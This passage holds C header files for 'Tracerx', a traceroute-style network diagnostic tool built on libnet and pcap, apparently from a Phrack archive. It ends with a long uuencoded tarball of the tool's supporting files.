+#ifndef _TX_REPORT_H
+#define _TX_REPORT_H
+
+#include "./tx_struct.h"
+
+void
+tx_report(
+    int,                    /* The class of packet we are reporting on */
+    u_char *,               /* The packet to report */
+    struct tx_control **    /* u know this one */
+    );
+
+
+#endif /* _TX_REPORT_H */
+
+/* EOF */
+<-->
+<++> P55/Tracerx/tx_util.h !928f1bf7
+/*
+ *  $Id: tx_util.h,v 1.1.1.1 1999/05/28 23:55:06 route Exp $
+ *
+ *  Tracerx
+ *  Misc routines
+ *
+ *  Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com>
+ *  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.  DEDICATED TO ARA.
+ *
+ */
+
+#ifndef _TX_UTIL_H
+#define _TX_UTIL_H
+
+#include "./tx_struct.h"
+
+/* 
+ *  Converts a string into an integer, handling bounding errors.
+ *  Accepts base 10 or base 16 numbers.
+ *  Taken from traceroute and slightly modified.
+ *  Exits with reason upon error.
+ */
+int                             /* The converted value */
+tx_str2int(
+    register const char *,      /* The string containing the value */
+    register const char *,      /* The title of the value (for errors only) */
+    register int,               /* Minimum value */
+    register int                /* Maximum value */
+    );
+
+
+int                             /* The protocol number */
+tc_prot_select(
+    char *,                     /* The protocol from the command line */
+    struct tx_control **        /* U know.. */
+    );
+
+
+int                             /* 1 == ok,  -1 == err */
+tx_get_hwaddrs(
+    struct ether_addr **,        /* local ethernet addr (to be filled in) */
+    struct ether_addr **,        /* remote ethernet addr (to be filled in) */
+    struct tx_control **,       /* U know.. */
+    u_char *                    /* errbuf */
+);
+
+#endif /* _TX_UTIL_H */
+
+/* EOF */
+<-->
+<++> P55/Tracerx/tx_error.h !b56cc374
+/*
+ *  $Id: tx_error.h,v 1.1.1.1 1999/05/28 23:55:06 route Exp $
+ *
+ *  Tracerx
+ *  Error handling routines
+ *
+ *  Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com>
+ *  Copyright (c) 1998 Mike D. Schiffman <mds@es2.net>
+ *  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.  DEDICATED TO ARA.
+ *
+ */
+
+#ifndef _TX_ERROR_H
+#define _TX_ERROR_H
+
+#define WARNING     0x1
+#define CRITICAL    0x2
+#define FATAL       0x4
+
+void
+tx_error(
+    int,
+    char *,
+    ...
+    );
+
+#endif /* _TX_ERROR_H */
+
+/* EOF */
+<-->
+<++> P55/Tracerx/tx_struct.h !20e7682d
+/*
+ *  $Id: tx_struct.h,v 1.2 1999/06/03 22:06:52 route Exp $
+ *
+ *  Tracerx
+ *  tracerx structure prototypes
+ *
+ *  Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com>
+ *                     Jeremy F. Rauch <jrauch@cadre.org>
+ *  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ */
+
+#ifndef _TX_STRUCT_H
+#define _TX_STRUCT_H
+
+#include <unistd.h>
+#include <pcap.h>
+#include <libnet.h>
+
+/*
+ *  Tracerx control structure.
+ */
+
+struct tx_control
+{
+    u_char tx_flags;                /* internal flags */
+    u_char *device;                 /* device to use */
+    u_char *tx_packet;              /* pointer to the packet */
+    u_short ip_tos;                 /* IP type of service */
+    u_short ip_df;                  /* IP dont fragment */
+    u_short burst_rate;             /* burst rate */
+    u_short current_ttl;            /* current IP TTL */
+    u_short max_ttl;                /* max IP TTL */
+    u_short initial_sport;          /* initial source port */
+    u_short initial_dport;          /* initial destination port */
+    u_short id;                     /* tracerx packet ID */
+    u_short use_name;               /* use domain names or dotted decimals */
+    u_short packet_size;            /* total packet size */
+    int packet_offset;              /* IP packet offset */
+    int protocol;                   /* transport protocol in use */
+    int probe_cnt;                  /* number of probes to send per round */
+    int verbose;                    /* verbose mode */
+    int reading_wait;               /* network reading wait */
+    int writing_pause;              /* network writing pause */
+    u_long host;                    /* destination host */
+    u_long packets_sent;            /* packets sent */
+    u_long packets_reply;           /* packets we got replies back */
+    struct sockaddr_in sin;         /* socket address structure */
+    struct libnet_link_int *l;      /* libnet packet injection structure */
+    pcap_t *p;                      /* pcap packet listening structure */
+};
+
+
+/*
+ *  Packet payload.
+ */
+struct tx_payload
+{
+    u_char seq;                     /* packet sequence number */
+    u_char ttl;                     /* TTL packet injected with */
+    struct timeval tv;              /* time vector */
+};
+#define TX_P    sizeof(struct tx_payload)
+
+#endif  /* _TX_STRUCT_H */
+
+/* EOF */
+<-->
+The following tarball contains the tracerx support files including the autoconf
+files and documentation.
+<++> P55/Tracerx/tracerx-package.tar.gz.uue !bddbaa9f
+begin 644 tracerx-package.tar.gz
+M'XL(")M)V#<``W1R86-E<G@M<&%C:V%G92YT87(`[%QK5]M(DYZOZ%?T,-G!
+M]L'RE9O)!6-,\+Q@.+9AR"%YC2RW;0VRI-4%S"3Y[_M4MR3+M\#,3K)GSXO.
+MC&UU=U5755=7/=42.=/N^,`PN6I8/WVO*U_(Y[?+Y9_R\J+OPLY6/KHOYK<+
+M/^6W=[:W\^5"OKB-]@+:T/_=)$I<@>=K+J9T;=O_UCC7#GS^(P3ZL=<ORB^,
+ML5>-?H6=35UA\YX5U"(K[.WMY?+;N7R)%8N5_'9EJ\"$'5A]XK!7BB3NN)K.
+MW>N87C36;.?1-88CGZ7TM&#$SHP[SHY4UM9'QF`PUBSV>HRF`\,:V!:?!)ZJ
+MV^.W@GK)]1MW^?B1':NLI07ZB+W^PZ7O`UWKNURUW>';4)P#W;8&QC!P>=>P
+MG,`_4)2+UOG[5O4LYO6&,5\(/5$:S7:G>GJ:[%)SA@6G,,VL-U*.ZL>-9KV=
+M[+\UC9[%_:R<AV6S?:AM<>^6'6!T^T"I'9]6WT])B.9`MJ&O-JN6Z*L=**>-
+MP_9<^\(\N,<D+&LZNN:P@^K14:/3.&]63[M$?:"<'_Y6KW5F9/4GW;%F6*I-
+MO[CKVJ[\.7"U,7^PW3MY&_B&*7^YW+%='[\_*FMK3#!P-/V.^]U>8)A].2AL
+M,:P_N.[/-$$P/Z#U8(L,X!L^=V>&WW/7&#RJMJ*HNFI7E+57J5HMS?`IS$6_
+MP@5(LZS.7KUF69N]PHIB=2KH#!<VK2C3WQ4&KIYA6^H((T*;I)>QCOH$TY@>
+M/\F<X!GQL1,LX\91!8YR56^UL0+*VH$[9MD!B;;F\3[+<K;AY=1,#G[D&SK3
+M1YH;\;CYA(59_W5]/[<QY<#>"K5TDVL6S""Y973;Y2P#BR4U2L@9_<20P%>4
+MON'YD@,37Q$?Z4"J:0^CG[JFCWAT0S(&7KQ]13-<VL-LM(;AJ!$V5_W\6/F_
+M#E@OUS]ZM>K5H[/Z]YWCB?Q?V"F5XOQ?*!4H_^-VZR7__X#KS3][*91W.JUJ
+MK=ZZGLES,0KH/3X7""S'`7\9%3R'S<CWG4HN]_#PH,K,--!TWW8?5>3?7`05
+M_FE3*2W^WX$!^;GE>Q4EF[R$U(>4<9EF]5D(2)B/J#VP3=-^,*QA11&CLDSB
+M!*;N[0V8[;(>]Y%GE2=U@Y%SDG3*1R`+M:QMS9,/?$?E7#5[ICJT[W.*TK'[
+M=BAT2%[M]YD7.(0?(*0+=M8=,[5'Y"YF0W(7XF.M_\".8YSN,;/*V*F4_L$P
+MS7!2BR.%^C9S-!]IJL\&ANOYJJ)<R2S(3I#GH,"<R4B0>`A=+8XD2-DXO&J8
+M?<B]!:K_Y26$5O,%,4=^3\5_<//P:EB&;V@F(ZB%562.:P]=[GG,E<)!*Z4A
+M%Q=`P;;FW:"@`B/$@%8IJFR,-*V4Y'?D%TJ9[JT8U"K*LS-UB#^^:XQY(O[C
+MVJ+X7RQM%[=+I2+%_X*H";^K5.'U'Q[_\_#<%TSWGWMINF'I9M#GZKC\O>9X
+MZORG5"C2_B^52OEB(5\6YS^%G>++_O\!5]\RZ?3GE8(?]+_(6O)$9\*TP+<I
+M^2"YZ*[MQ?T+ASN[FW_IB"?B4P6D$7PH'WK<O>=]50@22W-JVW>>0!,:<B>_
+M-VQ4JB'>"8MB`9`T0)ZQ`SZ`#7T.^#,V+,X>1@8P(1TRV)9@9_C,\(`Y(IB0
+M5W?9@^9)7$4H(V8*J.(S`*4`Z?61W5G\`<D6?"VZ%[P>:$0T'(S!1XWE#CQM
+MR"LS1JW6Z)BF6>]T:R?UVK^BF^@((1H*0P0FX<&P0=H#Q$?UX\MF"C]">+W`
+M9E.Y4<*)XJX4#+7)Q-%-UW`VJ>^L_5[V-YKO4Z'\:53Z@M88L)^9SV$(.LT`
+M@^Y%JW[<N`Z!HJKMDZVL&!V&_%KU]N5I)[6,@/5M[ED;@'P3P+;T/&6]U3IO
+MI72-1@P,K*2DD^.XZ?&8H#MGL3>WGN\"!GM+Y61?&("6P]9GG67]XT(]\(7I
+M`:E;8MG^.EN_W9\.@36D+?YDZZ_FYU^?,\6"4J>S;OH:S@;7^V`'3'/AF]HC
+MD/J(5";O\XTQ]]2/#.PN!#)DPP1M'I!2GV)[-G#M\;>+EM`.:266CYM09T$+
+MEC5]R?XI=19)#=IN-K/-/O1Z7^^P9OUW=MZLJ^G$I(D57'28.1,M3F'?)9@-
+M#$5^R15**Y^@GM@T+P=3?_?2=-/6-?,[9O\G\W^IM+.3R/_B^4]A>VOG)?__
+M@(MVS]0'$'0L[FH^BF;*_6,ZO!8)L/<8C6(%M20W70(%U`0**`L4L"4^M\7G
+MCOC<9<<NYZQM#_P'"GW'=F#U1;F[B0)9%UF3=4:&EWP$1=%E0&1>2";BTTI.
+M@L?0N.<>"RS3&!ND@T,XP)/YW&8ZY"6PD$,<I:-RU^C1HRS#WY3YW/!'%&+I
+M&VO-QG;?&$!]XNYM,J`$T[:&3*`%R&;9L`TG*9TI=IEJ(@I];4S]T[GH($=H
+M,;(=+B&&(4\^$-B!&?@@,*4P&,U^;W1.SB\[K-K\P'ZOMEK59N?#)BE"'/C$
+MYY8O-?2),U;(U![V(_$%%W[/Y7S&V#$-#(+17,WR'YD]8&?U5NT$/*N'C=-&
+MYP.I?MSH-.OM-CL^;[&JX'!1;74:M<O3:HM=7+8NSMOU4,D7S/B"&5\PXPMF
+M_/^-&5]`8_AT=QAPS_M><Q#^V]G:6H'_RCO;Q>+\^6^QM/5R_OLCKE]^9KF>
+M8>4\>KY?E1F1$J)P""101%G;(A#(O$</O<S2QER=?\5'XK_B)MLKX7_@P`@%
+M/H7\Z)4=@9?$FP>+D.\1D0\B(,/-(+8(Q@F,]H@&L`%G\8@)<1&IW".(0S?O
+MFY?LO4"U0#-!SS1T=@K@9B%:(HD[U.*-!'X"CV\AS'W&#?$4*XH\Q6B*D-\F
+M@BUXI)#B(;;+;,<7:5*S")KY4\J$VG\?)A)$!)=E(#$&@=\$@"!^"@(N@W^,
+MM3F/+`L>*VP[$*L#`P)9:8;I29TID7F0S.RSD7;/L:PZ!V;ODZ,1.G]RS<!#
+M$S!<H'4_8<)]RKP`Y9OLP07XCW#RS&J">MX#-]G6'NO`Z^%^%R8@+,NR=D`,
+M4(UNLD/;\VGH696A-BT4LH52'D7-9;LJ%:K2'O$<KM-#/C[1N5CS:/+5>FR2
+MM/`2L$@XMA_O!')-S?7)(%KL),(3$+!A4`OS@C9Z,B@48I[N&MB]TQH.-4$U
+MA..;8BN-`2#"\WYR*;%E0K?WL*^GL@@EQ#82DQ)M$*XJ#78)X8C%0F<H'@H#
+MN*-+U8A%,U_`X0]M?P1AV.N>_'&@/PZM$-&K8@]PR.0E]H;DF@@(F$"L8_N8
+M=D5N9(]Y;MC/@0WAE<16"K5/HOIO!C'FH4HT-2ADQY94O:`'#V\,R#I>H.N<
+M]U'[&:0DH+P$_4D>9'6_CZVV22$)?(!8,4QX9QZ<SBEB/!ABP?UD9R&2G#/'
+MU$2U*XPI=*>(AYU.I;=<Q?@)<*BEEW`?FV"P<,$!E;>8!%M=)_FEG/XC@DAJ
+M!$?.(=,10B3)TW+^<PN5BL8&*%7D<$]NS!['(FK]OGP0+X1"G/3W(:P`FNB2
+MS_0]BGA4K?KN(PV]XP#0PDJ^&^CT+J!\%TW,%RT5E<^PK&0N$'P065-C%X]P
+M)J//SML3U$L0PPVL*"`>MH\PU"!?$4DH-1QI?QH'EJVK;N`/T:SR?L!V<\5R
+M;J\,&`@SI:+2)*?"-RC7B<G2[&VNS^]S5H"P6GS[:X&%8';MHMHY>?.*/BL1
+M"?I@5GJQ@9H5@$KELED]JW?/JK631K/^YC8E-<B.TV`6,[YE7[ZPV9&!=6?9
+M#U9(WZJ?UJOM!+V[BCX:.4O?_M#NU,^FY-XJ\G#@+'5<%47D]ZO(HY$1O>*[
+MFL,VY/N%_6`\?E3U\-N6W_O"VUEA@Q60*0M;M/A-V^<59!E*U+1CC:$ECE@L
+MK(]87YU\JX<,I8^X)TH>1'2*JV;@8=418L2(]5>?9XSZM1(U2#6G]Z'5I@VA
+M(E_7X5*B(M!,9Z15SMO'A4JFDDDK:PCJ[,I2K6F=3B'$C5XFB7.X&-A9/7!@
+M<*0YX7RS--?S-!9\.B:#GW'7H'>"$*YZ:#*1Q$U!2J]D(PI[;!V_UD4PCKP&
+M_5P?V5*;;)_K6=L;W(JF>5.@>)V^HOKOFZO.]:=<;N,6#&B]\FQ_7]B%3F++
+ME=^Q.>T'K]OL5+;RE5)Z89H'P[+\DKHU3UX=&T,M4[EL-JZ[;1%9NE>5LIH7
+M)A8\QMN[=UF]-\XB\-R7(_J07"/R2I/[V/%R7<+:<(82=6#/Z\\K&`V=D4<R
+M/'>X]4V.`%S6LUFZXTJKT:YE*@7U!B7+)W#]0HVNX>G&)-$:F\T=9S7==JVL
+M'+(PS:P1PDB8@7=.,B3SE[-&>WHG?%5#P#UX<)"X\R7UP=$&/54;J$AL+%77
+M7*308Y55[Q#M"#=$\!)LQ`E8LW%:A^=$1Q;KMZF<C(\RPLX&@W7VAI)K'":E
+M2HZ4,1M]TV*6H`?5\"N&P+[*&D+HG,>0,*16I:_;WB0RV0+_>[<\3^D%5CE3
+M:0?6>;NRI8(%7-S7^HYM\IGFB*<':*5G097U;```PRLNWRE?IOODYM_JI\RR
+M;6+L;COZLDF,TNYVUM'_@2F2ZFW',4J''_4-(&%QLAV!ETV9JPV)5(#,$$S$
+ML1&-BE"0\2<G%H+C-D#*B>;VIW")3S3=!RH09Y5R3%Q[F,8=EY4'Z`U_PQ,M
+MIF"/;@'XJ06(6V@MW_@33,KJ*NN7_AG32,O(_'";"SQ7^#+F&K'LW:V(]_3W
+M""A?7(-[F2_M,HU?F\O#42+$5&N89(U[FD[*_J8YFL7!^U2SAH$VY%$$#P&3
+M%D=T*QCWN"O-<%M6"VHI^]OIQA+M`\OVGE0]F^LNU[LTJ_<TC,6\5T67.'X%
+MWLA99"(E1*?#)\]D!%QI9&:B=4(>T;LJ5"_G-!.F%UBMBM%+;;1"*#+2\T22
+M;%9)1'R>*<]8TT&QTDH.D/4S10HYK;228/5,J1S[@;N(8.`Y0N&69!9VA?S"
+M`4_QDPGQ#(-GY#(<3\`%XM*%6&6UM)SR\K33:EPOI0U,)+"5.3-B<U6]CKAD
+MDFSNM<E?X$*3BF1T>=:X:".?Q`TDINVEY=_Y$():0V!BKU_3>3)[&T)AY%1@
+M6OK+*Y9"S:6C.G2'`-?42O?[\B^",AEJWF>?$6&0A.7?D?5EL=:E&=/LUU^G
+MS21*_3`]-Y@@[X<+`7VOTA3B1*F*NF==6$Y\$-RPO?_R*#M_M-:E.#>%3^D0
+MI:?R:<2Z7[C5-P:KV%^URD^R1W+^F^SAR.52F@J.L"O9\]2\<*AG3!M^AS`N
+ME2U0[U?QJO3:J\^U6E;7O\:U3#8L8^A/H!BM@IJ3]S)BK\\[T'H$JRURBH^I
+MFWQV[U/F8UK-Y#X6<L[&;<P(-=-,P41MTOFBO]>:Z4[N@H323SEPDPYFNR?:
+MPUWE@O9QEY#XLMT-/P3'K+@%\)LL[(1=A)K:=>[RNK*3W)5HCFCU23#964J7
+MJ2`]M\JS5&/;MUVD_EG@/T>'F-LJ?8-N(7Q4KPSCO%GI#X-)$MXS]@L[>@_I
+M49CY@8MT+0?*Y\-`-000#)^+HPHO)I+&O6B=U^KM]GGKS110A`#!N4T^\;MA
+MK^8H`);'^NYN(9\7?UVXHK>09Y]B0"WY?.Y46^_KG>YAHUEM?>@VFIUZZ[A:
+MJW^=$!'L0!IR<S"1#H6+^'^3:I*8)&'/_C!+O)9X4@*\)T?V]"5N%SY@BQ[<
+MR7K*V`+X7<4_^6AN;A'/=G<SE2,;U:41H1)@K[@!X>*J59IQBK[L6^X3@IUP
+MI!`U'W'3UQCHHL,QN+Q%()KX/M_7KH\D8V(+_^KP.]\%M)Z(CGG6E^B^6B*Y
+M'U$MGP-4Y9*((N*C0FP6)RR7X&!+)F0I&3:GJ&`ZG:B_9B?+5!KS^5+$&F]H
+M9`VDRV?!U.$B3GT77I5JX_I=Y0;5L%JH%--B5Z*)%=6B6J#'#O*F@!L4#:U.
+M[J)&31%H=NVQDS50GFM0.=S4T7E;^-(/RHQ=-@)BU>T^9[6+2V8DM60SESR)
+M$@>N%>FPZQL1\O=N-]9#GALDU88L\][M;I,2E?D*+Y1JT:`TN"A.3+"OQ6L%
+M/=LK%;>8B"3A(7S.\_N&K8[FSR+CW1J#C.4H`[DT/,U_#2?(24?0!T-U]%9!
+M+P&0%!4Y:Y_I@PY#?^YV1:CO.GHJ+;J$Y"F1#-?6G,#W4NM1;@B5*V&5MM;E
+M`#$X+W^'N?,;R3.1-Y_(?,M37[C\WG8^GY^1AH+4C%W+?\VN*_B69X/?PH!E
+MYQ:9T"_*<JF%&!YE"M/3?-]EV?J)296XGH_>+[DX_[W>6BE:X_"L6VW53M[(
+MV6.)XO9P=:0L(FED)RS.3[8G#@R3(9\H6_6K1!(+!]W.,*<A975IA%\+]W\D
+MP]?()K()E`L`)#._76:-N7".TAN[?J6LED5%\R7:\15QFYZ/`Z*"6(`.DD=F
+M*8?9[:_;5*V'@4969.+YS>(T"Z>G1([J13[%D3$C>DZR,M[,!1_Y;RQ4XGG$
+M8PVJB*3=#L_;RPS7@Z=DX>L+ICNZN,X5W^7SE4/U7&VK"_6@(%R:8_;`-W=3
+M*G]"A,;\4+=24.?)1\ZRC#%RD'GB]1)';DNX%5=P6[)X$?7.+M&?7&0O(R,L
+M/_*?'N@(RE+A'9M9Y),+N5LP*_IIEK4YE1/C$X/O9H?N8%RHVNZ[F\+VSMXG
+MT$7C1XZC4=*:(=E]MT(4.5K*(L^53BXNK^76?-81F'J3/XP/PB1!R/LK&7;D
+M$-J*>"[LR%)^*Y^IG#2FEOUV"3O-+:@+$%`IJ5!=JZS)PA8,/I/:XGF\[@1`
+MFO`R\>YGJMNN=9&$H\<M:6&?7$8\[Y3/?\;TH-;U-EF/ZQH]6Z;AC787"IW5
+MMG?_Q>A?*[&X'7CF8X3=0\#KNX%\%$TD%]4NE>2%+CUN#7F$;3'DUVW7!<(/
+MR<.W)3?9"($4<0!TF1SU47Z<XY""7NFT)/P<TC,/>U\?R3Y%YE8F'UW-"E1A
+ME$Y1L88+GT6AH:':P'<P>>!%I%36<[EVM[^"0V&.0^$O<BC.R5!\4@84WQJ,
+M,T/U39*OTBCB2^#_A!'CI4Q:,60L@\$"XYA-."Q\WKAJY+3*?[*.?SX465V$
+MKY!F:2C;F4;!1'A$#$$$279$T3%>X:7A-@HL"<I9POS*.$V"_$][[]K0QI$L
+M#)^OUJ_H"!R!@B0D`;8A9$,PMCFQ@8.PXRP0>9!&8M:21M%(7-;V^]O?NG5/
+M]\Q(B#CQR=G'[,;JZ4MU]:VZNKJJ6E]O`AJ70\'!Q&5@$$:=-*#'%J",RC/*
+M$-=L%7&8%>*1<%L2N7G,L&!1AQYJFE_2`P!U5?OO-?<R7_XLWFV(]P^MXN;+
+M8.Q'Q73#J#-ZF)@LN5LM;NZ&@RO_AL^IJ!),GW$L9C'P6M42I],@Z9TA`;-V
+M-\R:Z<FN/X;>0RUYG*Y1R^MYHZ;7`L*-O<@=TJK7[&H?Q"?TEIM@G^)=G.IK
+M=R.%>>*6UM?F:&K]\1Q@'SM@'\\!=@YD'5SG0?5XY]?BV]*KHTUG@MP`[]8:
+M>;<PQX)6&,TJ_&NJ\*U;^"YA'D$YW2G]\_S)J@LH->-G0$6!D7WWCU#+Q;,E
+M`7RVC)+*@A$K8:[;RLY/NT_WGCU_L?_?/[]\=7!X]#_'C9/7;WYY^^L_*]Y%
+M"[:+[F7PK_>]_B`<_CZ*QI.KZYO;?U<R&W#2<'$?/UF];R>4:BX(+%Z;8QB>
+M(;/JZB(X,L)GK_][_Z3Q&F7HY@IPB+?((T6]HTZ]TK_/'<V)LPKQ84D(@/T4
+M9LXIK?A:SV!+,H@.8%GJ3/X5C*-):?&#A=2G^`O`?<I/;V9U1C.I%JBD:BJ9
+MW`RO!%L'6<$5$2T7[7:F#@$BH5H_GW:Q!01TOELM!]BTNRW<9^:[V**]!T!4
+MZO#+I*!(W^YM9VH!#5M("X*[P!<W4;,T@>+4_0>UF@'JW5Q^:>F\G'G3G763
+M.;4Z[O`Y:FMB;6?ES/HRAF#Z_LIC\EDU!D"Z?WW^R_Y!AA)%Z[9['0SJ*4YK
+MF%%&Q",]WV`WM30<Q#,51-(@/E^+H[CY_."UW9GO,KLT!K52*1<75U8*[PP2
+MW<'DKOI-H73U+X.!OAIYP(JG/SU[2DZ:X#2&%42L\H&*(W(,4.$%>GAD75PX
+M</51$QT.3E&((-CX+?*)Y]<*ZF._AY9LY=R#7KMYZ?>&3;:XVG[7`Q1+&$/B
+MKG?$P\A=FILUK^5D207-O'B70BVY_H0=)D6;<%[H-(/RXXU\S#^Z=W3VVNYA
+M+V!/YM66X?A)EOBGX()X4!7W0\8+)^._#J%6V.G<#Q\J\9?@@U0<!NQN=/2D
+M_XL'#/&9<\!2&/UUHP8]5*\-AZT44EHR?W?OL$9?6FJVK?*DO9E7"=BLTYD"
+M?`^XI#F4@LOZ1+/A\BEN0>VQA0W9[9:0/'GHV503J253..RU>^UEO#@*!V(A
+M@R:CI"V,=S=`@1@@&\L(X4&+PU9+77L#,?H-HC$,SB2(+M%(\AIUWMTJ2$O2
+M&>\RPJ4^^$:5VGR2[047E5Y;-/,K9<U!HTCA[J5&]>1M^0-=65OVR+[XSHO)
+M<BOL#X$DDQ(U]Q#T!,R9',F`QD:&I[[_'J4B=`UDJ:'DC!I*CM502&_B?"OW
+M(;<0H.M7U6SNO7S6;.8LK8N'D8.VJV^16Q"CS6G9L>M214@?0XF43JUNY42(
+MH]1T,8ZED6J+=#(FY!U2'J4RY3R=`'?,!34<WZBU\BI/*WTUJ`6)O=L5EO\_
+M_168[0KF90.%D0]SS/=&O2"V:$$+"=1D[_L1;M.3(4VJX81WVD'8]@DZ`$`C
+M&12A\J4"9-*)Y9BC-35NKB7YI,C_?>(/QMEJ%52XN+DFZK'TR<KRI)<=2Q60
+M2AV$5[B-.S=JN`:3%VHF[-ZK95!.6)-\!S%;VR!KI6272LMRI(7U<DVWQ1A^
+M8#O8&B^JM"[*V*4&8P-X^UVLOU,N:FO_2F584-]G07@W"^D@:L4G*J&<MOK(
+M6V<B6\$LO):<DA]]&B/Q;OG1=C>]#>@6EA&QS"+!X]6UQQM6;:1>YIJG!)!C
+M6OG";ZC7!T2I7#R"B19,^@4'&'J+?I"&N$X0IX]O*W2[ZN[I4,^\B-T?`//)
+MJH?UC#,$JAZF;L!@;_*ZX<"5*@2/-U9+Z+FA)X+#E,KWJEY*J(U!V5$]+EY`
+MC;$W:J-_#O=2^C:J3+PVD/7TS71RUR2@D8#)7`-0LZGF#=KM>38F).E;()^L
+M['O5I`%=&K3#401;7B^\9G\F_BV1J#:JE@'90I<:#B+F&)2%!U3SFM-M!-+C
+M`^W&,][)_END/,5U.8GD,9[\T>?CD_YJ=94E<Z.N;G]*N6=#E'O>G*YO/!(S
+M"U[R(X5]_6;CL=F#"R0]<+1Z"O%N8&[(Y/:R2)8J]3+>V$O<2M&)77N\OAI'
+M0,6'#5JKA8*%@S]N5<HC6/MM7!I0FV0J6Y3F]#=U7E3\KV@-TC^QYJ#ZWH8$
+MB]M10W/HB#"9SAHW>H<\FK"\2X/6B#>)<GWQ`^/TR=X:9U5`:50+4X#I-:W?
+M65-VMQ<S.MT2U=V[]<K\97="&I\^SJR7MP,4%Z=OL`TG"QGNEEKV6S"9ZTGA
+MXUH**JNV3]^ZL]`ARG8_=$X:F+Z?"2[!J,\%CW43''`P#J1Q>K2;68MH,]RO
+MFL:KTY_VSAO2BV_2ZN%M?QIWX>J8ORIN-O8!2"E#UVTPI?^318#(9\Z_Z;MX
+MRDITZ)I63=WO;)RL?7$0U6OO36*V4E)BPA4WGYV\98+[#!W!/$>C]+9ZX5\#
+M?_O])?[\B%*\OC=Z[X_%0!LRO\`MX@*/&,"L=V!K@%7OX:G)G)APY\'W(QQ%
+MVG_`X>A?_<1=FN2<ULOX/Q?)R/<&G1^CZW:K+&41L;*]3<^$B8NON+E3>?TV
+M)4AFHP8O4_W5G3)UG.!%W9-%D24?KZV:*X5?S8SD"TXY%@[\ECJW[S2-#)[F
+M&R3/Y(C3)6;MPC.N\([V#D[V7[_:W#U"_6ZDI\*XO!X$`$J]VP5.<G3DP>'C
+MQ:LCM?]68=L*J!.[5H$(O],)1V.+CJ;^%E3D`:#OCP,\3[;+K\H_>2-@GWYL
+MM5YY0:^\ZP\B&+OGAV]B=_SQ)C$A-&0$TTT@31DX+=(VOG00RN*#B=#',Y(Q
+M@H4YBH<J%`'`&2WL#H)_`Q^S7%#5'[ZM2?D_Q7"8X.4RSMGZ\-S8^Y_7T.=-
